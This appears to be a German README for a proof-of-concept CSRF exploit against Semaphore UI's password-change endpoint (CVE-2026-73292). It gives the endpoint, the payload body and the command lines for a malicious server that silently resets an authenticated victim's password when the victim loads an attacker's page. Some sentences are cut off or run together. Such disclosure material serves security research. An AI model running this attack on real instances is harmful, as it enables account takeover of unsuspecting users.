
Proof-of-Concept-Exploit für CVE-2026-73292: CSRF-Angriff auf den Endpunkt zur Passwortänderung der Semaphore-UI, der eine schädliche Seite bereitstellt, die das Passwort eines authentifizierten Benutzers stillschweigend zurücksetzt.
Nur für Bildungs- und verantwortungsvolle Offenlegungszwecke.
Diese Schwachstelle wurde in GHSA-8cj9-r88m-8945 gemeldet und betrifft semaphoreui-Versionen unter 2.18.21.
Der Endpunkt für Passwortänderungen von Semaphore UI implementiert keinen CSRF-Schutz:
semaphore) ohne SameSite-DurchsetzungEine schädliche Seite kann das Passwort jedes authentifizierten Benutzers, der sie besucht, stillschweigend ändern.
Betroffener Endpunkt: POST /api/users/{id}/password
{"password": "newpassword", "project_id": 1}
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]
| Argument | Beschreibung | Standard |
|---|---|---|
-u / --uri | Basis-URL der Semaphore-Instanz | erforderlich |
-i / --user_id | ID des Zielbenutzers | erforderlich |
-n / --new_password | Festzulegendes Passwort | passwordchanged |
-p / --port | Port, auf dem die schädliche Seite bereitgestellt wird | 1337 |
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337
Senden Sie das Opfer (bei Semaphore authentifiziert) an http://ATTACKER:1337. Sein Passwort wird sofort beim Laden der Seite geändert.
python poc.py -u http://TARGET:3000 -i 1
http://ATTACKER:1337/api/users/1/password mit HTTP 204 als Antwort.SameSite=Strict für das Sitzungscookie